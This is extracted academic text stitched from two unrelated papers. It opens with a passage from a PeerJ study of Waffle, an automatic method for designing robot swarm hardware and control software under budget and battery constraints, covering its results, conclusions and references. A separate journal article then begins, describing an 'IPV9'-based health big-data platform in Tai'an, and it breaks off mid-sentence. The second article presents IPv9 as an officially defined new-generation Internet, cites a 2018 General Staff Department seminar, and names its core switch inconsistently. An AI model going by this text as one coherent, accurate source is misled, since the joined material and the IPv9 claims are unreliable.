receivers, they often leave the black zone: due to the high loss-probability of low-tier range-&-bearing receivers, the robots often fail to perceive the presence of their peers in their neighborhood. The performance of the swarms designed under M80 and M60 is considerably lower than the one achieved under NC: in M80 and M60, the swarm comprises fewer robots as compared to NC—see Fig. 3A. Power-constraint In contrast to NC, the swarms configured under P20 and P15 have a total cost that is noticeably lower than the maximum possible—see Fig. 3D. This is because the robots are equipped with low-price range-&-bearing transmitters, which reduces the overall cost of the swarm—see Fig. 3D. Cheaper range-&-bearing transmitters have a shorter transmission range but have low power consumption, which allows a longer battery life. We observe a major shift in the dominant individual-level behaviors in the produced instances of control software. The robots stop in the first black zone they encounter and limit their movement to save energy—see Fig. 5A. Consequently, the swarm splits and becomes unable to gather on the same zone. As a result, the performance drops by approximately 50% as compared to the performance achieved under NC—see Fig. 3A. Monetary-&-power-constraint In all experiments, Waffle tends to use all the available monetary budget—see Fig. 3D. In M80P20 and M80P15, Waffle designs swarms that comprise 23 to 24 robots—see Fig. 3G— equipped with any of the range-&-bearing receivers and low-range transmitters. In M60P20 Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 13/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 (A) Anytime-Selection (B) End-Time-Aggregation (C) Foraging 1 0 0 2 0 0 0 5 1 0 1 5 2 0 0 2 5 k 5 0 k 7 5 k 1 0 0 k P e r fo r m a n c e (D) Anytime-Selection (E) End-Time-Aggregation (F) Foraging 4 3 .5 k 6 0 k 8 0 k 1 0 8 k C o s t o f a S w a r m (G) Anytime-Selection (H) End-Time-Aggregation (I) Foraging NC M80 M60 P20 P15 M80 P20 M80 P15 M60 P20 M60 P15 NC M80 M60 P20 P15 M80 P20 M80 P15 M60 P20 M60 P15 NC M80 M60 P20 P15 M80 P20 M80 P15 M60 P20 M60 P15 1 5 2 0 2 5 3 0 Experiments N o . o f R o b o t s Figure 3 The performance in all nine experiments on each mission is shown at the top. Performance of Waffle in all nine experiments for each mission: ANYTIME-SELECTION (A), END-TIME- AGGREGATION (B), and FORAGING (C). Total cost of the swarms configured by Waffle for each mission (D–F): 43.5k and 108k are the minimum and maximum possible cost (in €) of a swarm, respectively. Number of robots selected by Waffle for each mission (G–I). Full-size DOI: 10.7717/peerjcs.221/fig-3 and M60P15; however, the number of robots decrease considerably, and the robots are equipped with low-tier range-&-bearing receivers and low-range transmitters—see Figs. 3G and 4. The control software generated under the Monetary-&-Power-Constraint behave similarly to those of the Power-Constraint experiments—see Fig. 5A. Due to the increased battery capacity, the swarms produced under M80P20 and M60P20 perform slightly better than the ones produced under P15, M80P15, and M60P15—see Fig. 3A. End-time-Aggregation The performance of a designed swarm depends solely on the number of robots that are on the black zone at the end of an experiment. Contrary to Anytime-Selection, if economical Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 14/21 https://peerj.com https://doi.org/10.7717/peerjcs.221/fig-3 http://dx.doi.org/10.7717/peerj-cs.221 Figure 4 The number of instances of a specific hardware combination selected in each experiment is shown here. The horizontal axis represents the possible configurations of the range-&-bearing receivers Rxrb; the vertical one represents the possible ranges R of the range-&-bearing transmitters T y rb. Here,∅ rep- resents the case in which the design process does not select any range-&-bearing receiver or transmitter, x ∈{∅,1,2,3,4,5,6}, and y ∈{∅,1,2} as shown in Table 3. Full-size DOI: 10.7717/peerjcs.221/fig-4 (A) Anytime-Selection (B) End-Time-Aggregation (C) Foraging 0 25 50 75 100 0 25 50 75 100 0 25 50 75 100 NC M80 M60 P20 P15 M80 P20 M80 P15 M60 P20 M60 P15 Experiment-Time (%) Behaviors: Anti-Phototaxis Attraction Exploration Phototaxis Repulsion Stop Figure 5 Behaviors adopted by the robots in the experiments for the three missions considered: ANYTIME-SELECTION (A), END-TIME-AGGREGATION (B), and FORAGING (C). Each color represents a behavior. The videos of all experiments are available as online supplementary material (Salman, Ligot & Birattari, 2019). Full-size DOI: 10.7717/peerjcs.221/fig-5 constraints are applied, the design process tends to select high-tier hardware; and the control software is composed of individual-level behaviors that keep robots assembled on a black zone. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 15/21 https://peerj.com https://doi.org/10.7717/peerjcs.221/fig-4 https://doi.org/10.7717/peerjcs.221/fig-5 http://dx.doi.org/10.7717/peerj-cs.221 No-constraint Waffle tends to configure robot swarms whose total cost is close to the maximum possible—see Fig. 3E. The hardware configuration is similar to the one generated under NC for Anytime-Selection. Indeed, the robot swarms comprise 28 to 30 robots—see Fig. 3H—equipped with high-tier range-&-bearing receivers and transmitters—see Fig. 4. At visual inspection, the robots first form clusters and then converge on a black zone: robots tend to remain there by spinning in place until the end of the experiment. This behavior is obtained with Exploration, Attraction, and Stop—see Fig. 5B. The performance of the swarm is considerably better than those achieved when constraints are imposed—see Fig. 3B. Monetary-constraint Under the constraints imposed by M80 and M60, Waffle tends to configure the robot swarm so that the total cost is close to the maximum available budget—see Fig. 3E. The number of robots in the swarm decreases proportionally to the monetary budget—see Fig. 3H. The robots are equipped with long-range range-&-bearing transmitters and high-tier receivers, except a small minority of configurations in which the robots are equipped with low-tier receivers—see Fig. 4. At visual inspection, in M80 and M60 the robots converge on a black zone and stay there until the end of the experiments. Contrary to NC, the robots stop on the black zone instead of spinning in place: dominant individual-level behaviors are Exploration, Attraction, and Stop—see Fig. 5B. The amount of available monetary budget has a direct impact on the performance of a swarm. Indeed, due to the limited monetary budget, the number of robots decreases in the swarms designed under M80 and M60, which results in a considerable performances drop as compared to the performance achieved under NC—see Fig. 3B. Power-constraint Similar to NC, under the constraints imposed by P20 and P15, Waffle tends to configure the robot swarm so that the total cost is close to the maximum possible—see Fig. 3E. Indeed, the robot swarms comprise 28 to 29 robots—see Fig. 3H—equipped with high-tier range-&-bearing receivers and long-range transmitters—see Fig. 4. However, this selection of hardware has a direct impact on the duration of the experiments due to its high current rating. As the maximum power is consumed by the motors, the designed control software skips the Exploration behavior to move robots in the arena. In some instances of control software, the robots use Phototaxis and Anti-Phototaxis individual-level behaviors to move straight and avoid obstacles. Moreover, the most dominant individual-level behavior is Attraction which is used to keep the robots assembled on one zone—see Fig. 5B. The performance achieved under P20 is relatively higher than the one achieved under P15. Due to the limited battery capacity, which affects the total experiment duration, the swarms designed under P20 and P15 have a lower performance than those designed under NC—see Fig. 3B. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 16/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 Monetary-&-power-constraint In all experiments, Waffle tends to use all the available monetary budget—see Fig. 3E. In M80P20 and M80P15, Waffle designs swarms that comprise 22 to 24 robots—see Fig. 3H— equipped with high-tier range-&-bearing receivers and long-range transmitters—see Fig. 4. In M60P20 and M60P15, the number of robots decreases considerably, and the robots are equipped with high-tier range-&-bearing receivers and long-range transmitters, except a small minority of configurations in which robots are equipped with low-tier receivers—see Fig. 4. The instances of control software produced are similar to those produced under Power-Constraint: the movement of robots in the arena is identical and the prominent individual-level behavior is Attraction—see Fig. 5B. The performance achieved under M80P20 and M80P15 is slightly better than the one achieved under M60P20 and M60P15: the level of monetary budget is the key factor that determines whether Waffle selects few or more robots—see Fig. 3B. Foraging Similar to Anytime-Selection, the performance of swarms designed in the Foraging experiments depends on the experiment duration, but it also depends on the total number of robots. Contrary to both Anytime-Selection and End-time-Aggregation, the individual robots do not rely on the range-&-bearing hardware. The control software produced enables an effective movement between source and nest. All categories of constraints Under all the categories of constraints considered, Waffle produced robot swarms sharing the same hardware configuration. This because, in Foraging, the robots do not rely on local communication. As a result, the selected hardware configuration typically does not include range-&-bearing transmitter and receiver—see Fig. 4. The total cost of a swarm is between 80,000€ and 60,000€—see Fig. 3F. The swarm comprises the largest possible number of robots—see Fig. 3I. All instances of control software that are produced in all experiments have an unexpected behavior. Although in all experiments of Foraging, the robots are not equipped with range-&-bearing modules, the most prominent individual-level behaviors are Attraction and Repulsion, which the robots use to explore the arena—see Fig. 5C. The swarm uses these behaviors in a way that is completely different from the one originally intended (Francesca et al., 2014). The reason behind this anomaly is that the individual-level behaviors in the design space are not strictly associated with the related hardware. In the absence of range-&-bearing receivers and transmitters, the Attraction and Repulsion behaviors are actuating robots to move straight using proximity sensors to avoid obstacles. In all Foraging experiments, Waffle selects the Phototaxis individual-level behavior to locate the nest in the arena, as shown in Fig. 5C. There is no prominent performance difference between the experiments under the No-Constraint and Monetary-Constraint categories—see Fig. 3C. However, we observe a considerable performance drop by the swarms designed under categories of experiments that have limited battery capacity—that is, Power-Constraint and Monetary-&-Power- Constraint. Indeed, the performance achieved in experiments with 20 mAh battery Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 17/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 capacity—i.e., P20, M80P20, and M60P20—is considerably better than the performance achieved under experiments with 15 mAh battery capacity—i.e., P15, M80P15, and M60P15— see Fig. 3C. CONCLUSIONS In this paper, we studied the concurrent automatic design of control software and the automatic configuration of the hardware of robot swarms. In particular, we showed that it is possible to concurrently design control software and hardware for a robot swarm using the principles of automatic modular design. We introduced Waffle, a new instance of the AutoMoDe family of automatic design methods that configures the robot hardware, selects the number of robots in the swarm, and produces control software in the form of a probabilistic finite state machine by combining pre-existing modules that are mission independent. We studied Waffle under economic constraints on the total monetary budget available and on the battery capacity of each individual robot comprised in the swarm. We tested Waffle on three different collective missions. In the experiments presented in the paper, Waffle was able to concurrently design the control software and configure the hardware of a robot swarm. The results suggest that the hardware configuration of the individual robots, the design of control software, and the number of robots highly depend on the nature of the collective mission and the economical constraints imposed. In the paper, we only considered the automatic configuration of one type of hardware module, future studies will focus on extending the automatic design to other sensors and actuators. The range-&-bearing receivers and transmitters proposed in the paper can be manufactured and real-robot experiments can be performed to assess the robustness of the selected configuration to the reality gap. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research has received funding from the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation programme (grant agreement No 681872). Mauro Birattari received support from the Belgian Fonds de la Recherche Scientifique – FNRS. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: European Research Council (ERC): 681872. Belgian Fonds de la Recherche Scientifique – FNRS. Competing Interests Mauro Birattari is an Academic Editor for PeerJ. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 18/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 Author Contributions • Muhammad Salman conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Antoine Ligot performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Mauro Birattari contributed reagents/materials/analysis tools, conceived and designed the experiments, analyzed the data, directed the research, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The data is available at IRIDIA - Supplementary Information, ID: IridiaSupp2019-001: http://iridia.ulb.ac.be/supp/IridiaSupp2019-001/. REFERENCES Birattari M, Ligot A, Bozhinoski D, Brambilla M, Francesca G, Garattoni L, Garzón Ramos D, Hasselmann K, Kegeleirs M, Kuckling J, Pagnozzi F, Roli A, Salman M, Stützle T. 2019. Automatic off-line design of robot swarms: a manifesto. Frontiers in Robotics and AI 6:Article 59 DOI 10.3389/frobt.2019.00059. Brambilla M, Brutschy A, Dorigo M, Birattari M. 2015. Property-driven design for swarm robotics: a design method based on prescriptive modeling and model checking. ACM Transactions on Autonomous and Adaptive Systems 9(4):17.1–17.28 DOI 10.1145/2700318. Brambilla M, Ferrante E, Birattari M, Dorigo M. 2013. Swarm robotics: a re- view from the swarm engineering perspective. Swarm Intelligence 7(1):1–41 DOI 10.1007/s11721-012-0075-2. Carlone L, Pinciroli C. 2019. Robot co-design: beyond the monotone case. ArXiv preprint. arXiv:1902.05880v1. Clark AJ, Moore JM, Wang J, Tan X, McKinley PK. 2012. Evolutionary design and experimental validation of a flexible caudal fin for robotic fish. In: Artificial life conference proceedings 12. Cambridge: MIT press, 325–332. Dorigo M, Birattari M, Brambilla M. 2014. Swarm robotics. Scholarpedia 9(1):Article 1463 DOI 10.4249/scholarpedia.1463. Francesca G, Brambilla M, Brutschy A, Garattoni L, Miletitch R, Podevijn G, Reina A, Soleymani T, Salvaro M, Pinciroli C, Birattari M. 2015. AutoMoDe-Chocolate: Automatic design of control software for robot swarms. Swarm Intelligence 9(2/3):125–152 DOI 10.1007/s11721-015-0107-9. Francesca G, Brambilla M, Brutschy A, Trianni V, Birattari M. 2014. AutoMoDe: a novel approach to the automatic design of control software for robot swarms. Swarm Intelligence 8(2):89–112 DOI 10.1007/s11721-014-0092-4. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 19/21 https://peerj.com http://iridia.ulb.ac.be/supp/IridiaSupp2019-001/ http://dx.doi.org/10.3389/frobt.2019.00059 http://dx.doi.org/10.1145/2700318 http://dx.doi.org/10.1007/s11721-012-0075-2 http://arXiv.org/abs/1902.05880v1 http://dx.doi.org/10.4249/scholarpedia.1463 http://dx.doi.org/10.1007/s11721-015-0107-9 http://dx.doi.org/10.1007/s11721-014-0092-4 http://dx.doi.org/10.7717/peerj-cs.221 Garattoni L, Francesca G, Brutschy A, Pinciroli C, Birattari M. 2015. Software Infras- tructure for E-puck (and TAM). Technical report TR/IRIDIA/2015-004, IRIDIA, Université libre de Bruxelles, Belgium.. Gutiérrez Á, Campo A, Dorigo M, Donate J, Monasterio-Huelin F, Magdalena L. 2009. Open e-puck range & bearing miniaturized board for local communication in swarm robotics. In: Kosuge K, ed. IEEE International conference on robotics and automation, ICRA. Piscataway: IEEE Press, 3111–3116. Hamann H. 2012. Towards swarm calculus: universal properties of swarm performance and collective decisions. Berlin: Springer, 168–179. Hamann H, Wörn H. 2008. A framework of space–time continuous models for algorithm design in swarm robotics. Swarm Intelligence 2(2–4):209–239 DOI 10.1007/s11721-008-0015-3. Hasselmann K, Ligot A, Francesca G, Birattari M. 2018. Reference models for Auto- MoDe. Technical report TR/IRIDIA/2018-002, IRIDIA. Université libre de Bruxelles, Belgium. Hasselmann K, Robert F, Birattari M. 2018. Automatic design of communication-based behaviors for robot swarms. In: Dorigo M, ed. Swarm intelligence, ANTS, volume 11172 of LNCS. Cham: Springer, 16–29 DOI 10.1007/978-3-030-00533-7_2. Heinerman J, Rango M, Eiben AE. 2015. Evolution, individual learning, and social learning in a swarm of real robots. In: 2015 IEEE symposium series on computational intelligence. Piscataway: IEEE Press, 1055–1062. Hewland J, Nitschke GS. 2015. The benefits of adaptive behavior and morphology for cooperation. In: 2015 IEEE symposium series on computational intelligence. Piscataway: IEEE Press, 1047–1054. Hornby GS, Lipson H, Pollack JB. 2003. Generative representations for the automated design of modular physical robots. IEEE Transactions on Robotics and Automation 19(4):703–719 DOI 10.1109/TRA.2003.814502. Kuckling J, Ligot A, Bozhinoski D, Birattari M. 2018. Behavior trees as a control architecture in the automatic modular design of robot swarms. In: Dorigo M, ed. Swarm intelligence, ANTS, volume 11172 of LNCS. Cham: Springer, 30–43 DOI 10.1007/978-3-030-00533-7_3. Lerman K, Galstyan A. 2002. Mathematical model of foraging in a group of robots: effect of interference. Autonomous Robots 13(2):127–141 DOI 10.1023/A:1019633424543. Lipson H, Pollack JB. 2000. Automatic design and manufacture of robotic lifeforms. Nature 406:974–978 DOI 10.1038/35023115. Lopes YK, Trenkwalder SM, Leal AB, Dodd TJ, Groß R. 2016. Supervisory control theory applied to swarm robotics. Swarm Intelligence 10(1):65–97 DOI 10.1007/s11721-016-0119-0. López-Ibáñez M, Dubois-Lacoste J, Pérez Cáceres L, Birattari M, Stützle T. 2016. The irace package: iterated racing for automatic algorithm configuration. Operations Research Perspectives 3:43–58 DOI 10.1016/j.orp.2016.09.002. Macinnes I. 2003. Visually guided physically simulated agents with evolved morpholo- gies. In: Advances in artificial life. Berlin: Springer, 821–828. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 20/21 https://peerj.com http://dx.doi.org/10.1007/s11721-008-0015-3 http://dx.doi.org/10.1007/978-3-030-00533-7_2 http://dx.doi.org/10.1109/TRA.2003.814502 http://dx.doi.org/10.1007/978-3-030-00533-7_3 http://dx.doi.org/10.1023/A:1019633424543 http://dx.doi.org/10.1038/35023115 http://dx.doi.org/10.1007/s11721-016-0119-0 http://dx.doi.org/10.1016/j.orp.2016.09.002 http://dx.doi.org/10.7717/peerj-cs.221 Mondada F, Bonani M, Raemy X, Pugh J, Cianci C, Klaptocz A, Magnenat S, Zufferey J-C, Floreano D, Martinoli A. 2009. The e-puck, a robot designed for education in engineering. In: Gonçalves P, Torres P, Alves C, eds. Proceedings of the 9th conference on autonomous robot systems and competitions. Portugal: Instituto Politécnico de Castelo Branco, 59–65. Nolfi S, Floreano D. 2000. Evolutionary robotics. Cambridge: MIT Press. Nygaard TF, Martin CP, Samuelsen E, Torresen J, Glette K. 2018. Real-world evolution adapts robot morphology and control to hardware limitations. In: Proceedings of the genetic and evolutionary computation conference, GECCO ’18. New York: ACM Press, 125–132 DOI 10.1145/3205455.3205567. Pahl G, Beitz W, Feldhusen J, Grote K-H. 2007. Engineering design: a systematic ap- proach. London: Springer. Pinciroli C, Trianni V, O’Grady R, Pini G, Brutschy A, Brambilla M, Mathews N, Ferrante E, Di Caro G, Ducatelle F, Birattari M, Gambardella L, Dorigo M. 2012. ARGoS: a modular, parallel, multi-engine simulator for multi-robot systems. Swarm Intelligence 6(4):271–295 DOI 10.1007/s11721-012-0072-5. Şahin E. 2004. Swarm robotics: from sources of inspiration to domains of application. Berlin: Springer, 10–20. Salman M, Ligot A, Birattari M. 2019. Concurrent design of control software and config- uration of hardware for robot swarms under economic constraints: supplementary material. Available at http://iridia.ulb.ac.be/supp/IridiaSupp2019-001/ . Sims K. 1994. Evolving virtual creatures. In: Proceedings of the 21st annual conference on computer graphics and interactive techniques, SIGGRAPH ’94. New York: ACM Press, 15–22 DOI 10.1145/192161.192167. Trianni V. 2008. Evolutionary Swarm Robotics. Berlin: Springer. Watson J, Nitschke G. 2015. Deriving minimal sensory configurations for evolved cooperative robot teams. In: 2015 IEEE Congress on Evolutionary Computation (CEC). Piscataway: IEEE Press, 3065–3071. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 21/21 https://peerj.com http://dx.doi.org/10.1145/3205455.3205567 http://dx.doi.org/10.1007/s11721-012-0072-5 http://iridia.ulb.ac.be/supp/IridiaSupp2019-001/ http://dx.doi.org/10.1145/192161.192167 http://dx.doi.org/10.7717/peerj-cs.221 work_qaeelizvxng5tkeu5rhhxdulxm ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 14 Design and Research of Healthy Ecology System Framework Based on IPV9 Li Qinyu Tai'an Finance Health Medical Information Technology Co., LTD Shandong Radio, Television and Network Co., LTD. Tai'an Branch. 639 Leigushi Street, Tai'an 271000, Shandong Province e-mail: 13720517562@163.com Zhao Hongwen Shandong Radio, Television and Network Co., LTD. Tai 'an Branch. 639 Leigushi Street, Tai'an 271000, Shandong Province e-mail: tagdglcs@qq.com Geng An Shandong Radio, Television and Network Co., LTD. Tai 'an Branch. 639 Leigushi Street, Tai'an 271000, Shandong Province e-mail: 398705156@qq.com Han Lei Shandong Radio, Television and Network Co., LTD. Tai 'an Branch. 639 Leigushi Street, Tai'an 271000, Shandong Province e-mail: 2839437805@qq.com Abstract—With the improvement of living standard and the change of life, people’s health awareness has been enhanced as a whole, and the health demand has changed from single medical service to multiple services such as disease prevention, health promotion, healthcare and rehabilitation. The wisdom medical system, Internet + medical service mode and digital hospital have become the direction of medical development. In order to build Tai'an healthy big data ecological domain, accelerate the traditional medical process informatization reform, and improve the application level of information service, we build a medical system with the support of new generation network IPV9 technology. The system is based on the medical institutions in Tai’an city, Shandong province, and has researched and implementation of the health ecosystem business structure, core technology, network architecture, system software and hardware, and system security. The system was put into trial operation in the medical institutions of the whole city and has achieved perfect results. Keywords-IPV9; Internet +; Healthy Ecology; Health Platform I. THE CURRENT STATUS OF HEALTH CARE A. Medical health background A new round of scientific and technological revolution and industrial changes are accelerating. Life science technologies continuously made new breakthroughs, and major technologies such as genetic engineering, molecular diagnostics, stem cell therapy, and 3D printing are accelerating applications. The new generation information biology and engineering technologies such as big data, cloud computing, Internet, artificial and intelligence are increasingly integrated into the medical and health fields. The rapid DOI: 10.21307/ijanmc-2019-055 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 15 development of telemedicine, mobile medical care, precision medical care, smart medical care and other technologies have promoted the vigorous development of new formats and models of health industry, such as health management, health care, health tourism, leisure and health care, and “Internet + health”. “13th Five-Year Plan for National Population Health Informatization Development” pointed out: We should strengthen population health informatization and health care big data service system construction, promote integration of government health care information system and public health medical data fusion, and eliminate information barriers, focus on improving the ability and level of population health information governance, vigorously promote the development of health care big data applications, and explore new models and new formats of innovative "Internet + health" services. We will build a unified, authoritative and interconnected platform for population health information, standardize and promote "Internet+ health care" services, and create new models of Internet health care services. Data collection, integration and sharing and business coordination of applied information systems such as public health, family planning, medical services, medical security, drug supply and comprehensive management are realized. In recent years, the aging population in Shandong province is characterized by large base, rapid growth and empty nest. On the one hand, the needs of elder's life care and medical health care are superimposed, and the consumption demand in the field of medical care, health care are strong, with huge space for the development of related industries. On the other hand, the health care industry in Shandong province is still in its infancy, with relatively insufficient supply-side capacity, structural contradictions and policy barriers, lack of high-quality resources, narrow coverage of medical care, and insufficient professional personnel, making it difficult to meet the needs of the elderly for different levels of health care services. B. Tai'an health care platform In 2016, Tai'an City proposed in the of “Tai'an City transformation and upgrading of medical and health service industry implementation plan” to accelerate the construction of "smart medical" system, explore the "Internet + medical" service mode, and build a digital hospital. We will build a sound healthy Tai'an big data ecological domain, accelerate the informatization reform of traditional medical treatment process, and improve the application level of informatization services. The government encourages medical and health institutions to make full use of the advantages of Internet development. The design and research of this system is based on the medical informatization of Tai'an City, Shandong Province, which is led by Tai’an Central Hospital of Tai'an City, Tai'an Central Hospital and Tai'an City Hospital of Traditional Chinese Medicine. The district and county people's hospitals are the main force, and the informatization development of the hospital is relatively perfect. However, some secondary hospitals, primary health care institutions, medical associations, medical communities, Internet hospitals, regional medical and health platforms and other information systems are not perfect, and they are unable to meet the growing needs of medical information development. Take the construction of medical and health information in Feicheng City as an example. With the rapid development of IT technology, SOA technology, SaaS application, wireless network and other new technologies, the price of IT equipment is getting lower and lower, which makes the construction of smart city feasible technically and economically. Meanwhile, with the continuous application of cloud computing technology in the practice of medical informatization, the construction of regional medical informatization can achieve better results on this basis. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 16 In August 2007, the Ministry of Information Industry Officially defined IPv9 as a new generation Internet to distinguish IPv6 next-generation Internet. The Internet based on TCP/IP protocol has been unable to meet the needs of future development by increasing bandwidth and gradual improvement. In order to break through the future network basic theory and support a new generation of Internet experiment. It is necessary to build test facilities include: original network equipment system, resource monitoring management system, covering cloud computing services, Internet of Things applications, spatial information network simulation, network information security. On November 20, 2018, the General Staff Department of the People's Liberation Army organized the IPv9 Technology Project Application Seminar at the No. 9 Dacheng Road in Beijing. They discussed and demonstrated the application of the healthy Tai’an Big Data Ecological Domain as an IPv9 technology application. It is required to speed up construction of the Tai’an big data ecological domain and rapidly increase the scale of the IPv9 network, and strive to build an IPv9 network technology demonstration zone through healthy Tai’an big data ecological domain. Tai’an City "smart medicine" was achieved through the establishment of a unified data standard for health information in Tai'an City, public health information resources sharing, and electronic two-way referral and inspection results in the city mutual recognition and health card application in the city. With the healthy Tai’an big data ecological domain as the core, it realizes information interconnection and sharing, as well as comprehensive business collaboration. It promotes the development of a large health industry, achieves a more scientific management, smarter business, and benefits more residents, and promotes the openness of the health and family planning business in Tai'an City. Through the construction of this platform, the informatization construction of health and family planning in Tai'an City has reached the national first-class level. II. ECOLOGICAL DOMAIN SYSTEM Tai’an big data ecological domain can provide personalized health management and health care for residents, improve residents' satisfaction. It can provide life-cycle health information for residents, and provide residents with network and information health services and health management. It enables residents to obtain continuous, comprehensive and high-quality health care services. It improves the efficiency of health services and reduces the waiting time of residents. We will support the rational use of high-quality regional health resources; effectively resolve the rational division of labor and allocation between primary and secondary large hospitals. A. System business architecture The health Tai’an big data ecosystem consists of five parts: business system layer, IT basic service layer, data layer (data warehouse), application layer and service layer (Internet + convenient service platform). The business systems layer includes the business systems of medical institutions, health management centers, public health institutions, and other administrative agencies. Through the IPv9 service private network, network equipment, servers and storage equipment in the IT basic service layer, data such as electronic medical records, health files, population, and health resources are stored in the data layer. We divide the platform business system into three categories according to the different roles of data usage. The first category is the Internet + service platform for residents (including health Tai’an website, health Tai’an APP, Internet hospital, etc.). The second category is the medical collaborative service system for medical and health personnel (including hierarchical diagnosis and treatment platform, health identity card management system, telemedicine, health Tai’an imaging/ECG/inspection/pathology, etc.). The third International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 17 category is the medical and health supervision system which serving the medical and health administrative institutions (including the medical and health supervision platform, medical reform monitoring system, third-party regional evaluation system, etc.). Meanwhile, business intelligence in data warehouse can be used to support the development of big data analysis and artificial intelligence. The entire platform architecture conforms to the international and national information standard management system and information security protection framework to ensure the consistency and security of the exchange of data. Meanwhile, the remote disaster recovery and backup mode in line with international requirements is specially used to ensure the safe storage of data from natural or man-made disasters. Figure 1. Business architecture of health Tai’an big data ecological domain B. Overall technical architecture The health Tai’an big data ecological domain database uses relational databases such as MySQL, Oracle, SQL Server, and the development language uses JAVA and .net. The platform service is built with ESB bus and SOA architecture, which provides perfect technical support for big data, and realizes rapid access to massive data. The flat platform provides complete functions such as collaborative support services and configuration management, and provides a comprehensive monitoring mechanism for the operating environment, which facilitates the rapid positioning and troubleshooting of problems. The overall technical framework of the platform conforms to the national standard and standard system, and adopts the data exchange standard of the industry standard, and adopts a variety of security mechanisms and security technologies to ensure the stable operation of the platform. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 18 Figure 2. Technical architecture of health Tai’an big data ecological domain 1) SOA architecture support The platform adopts the Micro services architectural mode. Micro services are an updated version of the traditional SOA architectural pattern that supports for fine-grained control. Each system accessed in healthy Tai’an big data ecological domain is equivalent to micro services component, which dynamically realizes service scheduling and balance through registration and discovery mechanism. In addition, each service component can deploy multiple instances, effectively improving the overall stability of the platform. A service component is a mineralized project with distributed deployment and invocation that provides a type of interface services. In terms of interface granularity division of service components, appropriate granularity should be adopted to split the interfaces to ensure the flexibility of top-level application calls and reduce the number of calls between different components to avoid complex business logic dependencies between components. 2) ESB bus technology ESB (Enterprise Service Bus) is the combination of traditional middleware technology and XML, Web Service technology. The ESB provides the most basic connectivity hub in a network and is an essential element in building an enterprise nervous system. The enterprise service bus is the latest way to provide reliable, guaranteed messaging technology.ESB middleware products leverage Web services standards and interfaces with recognized reliable messaging protocols. Common features of ESB products include: connecting heterogeneous MOM, encapsulating the MOM protocol using the Web services description language interface, and the ability to transport Simple Object Application Protocol (SOAP) transport streams on the MOM transport layer. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 19 The ESB uses the "bus" model to manage and simplify the integration topology between applications, based on open standards to support dynamic interconnectivity between applications at the level of messages, events, and services. The platform adopts B/S architecture and SaaS deployment mode, which is different from traditional medical information platform manufacturers and the overall architecture design, is more advanced and efficient. C. Overall standard architecture of the platform Following the unified standard, unified code, unified interface, under the principle of combing and standardized data through canonical business definition, strictly in accordance with established standards and technical route, so as to realize multiple departments, multiple system, information technology, as well as heterogeneous platform environment, interconnection, make sure that the maturity of the whole system, expansibility and adaptability, to evade the risk of system construction. Under the principle of “unified specification, unified code, and unified interface”, the system strictly abides by established standards and technical routes, thereby achieving information interconnection in multi-sector, multi-system, multi-technology, and heterogeneous platform environments. Figure 3. The standard architecture health Tai’an big data ecological domain International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 20 D. Platform security architecture The platform security architecture refers to ISO-27001 and the third level of the national information security level protection system requirements. From the aspects of technology, operation and maintenance, management system and infrastructure, it is divided into security technology system, operation and maintenance security system, information security management system, security infrastructure and other parts. Figure 4. The security architecture health Tai’an big data ecological domain The security technology system is mainly divided into application security, data security, network security and host security. 1) Application security. Application security mainly against common WEB security vulnerabilities published by OWASP. It mainly includes SQL injection, invalid authentication and authentication management, XSS attacks, invalid access control, sensitive information disclosure, CSRF, use of known vulnerability components, unprotected API, insufficient logging and monitoring and other WEB vulnerabilities. 2) Data security. Database security relies on various technologies and management measures to ensure data security, availability, integrity and confidentiality through data encryption, data desensitization, data storage backup, and access control. 3) Network security. Network security is mainly to ensure the integrity, confidentiality and non-repudiation of data in the process of network transmission. Through data transmission process encryption, intrusion prevention guarantees network security. 4) Host security. Host security solves the main security risks faced by the server, builds a server security protection system to prevent information leakage and risk by firewalls, white list isolation, security configuration, etc. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 21 III. SYSTEM NETWORK ARCHITECTURE The system is divided into six areas, and the core area is two Huawei S2710 data center level switch clusters. The core area is connected to all other areas using dual gigabit connections. The network topology is shown in figure 5. Figure 5. Topology architecture of healthy Tai’an big data ecological domain network The access area is the area where all health cares institutions access. Two Huawei 10 Gigabit firewalls are used for isolation and aggregation. The business volume in the early stage is limited, and each of the two firewalls uses a 10 Gigabit connection, which can be expanded at any time with the business development in the future. The internal network area is centered on two IPv9 backbone routers and Huawei 6650 data firewall. The data firewall isolates the internal network from the core switch 12710 to protect it. The establishment of virtual servers and storage devices in the internal network area is completed through optical fiber switches. The IPv9 router backbone router encrypts the address of the core data area of the internal network for higher security. The external network deployment has the external network firewall. The anti-attack device is deployed to further increase the security protection of the external network. Platform logging, auditing, monitoring and IPv9 management are deployed in the management area. The security zone is used to deploy TOPSEC vulnerability scanning, network auditing, and flow International Journal of 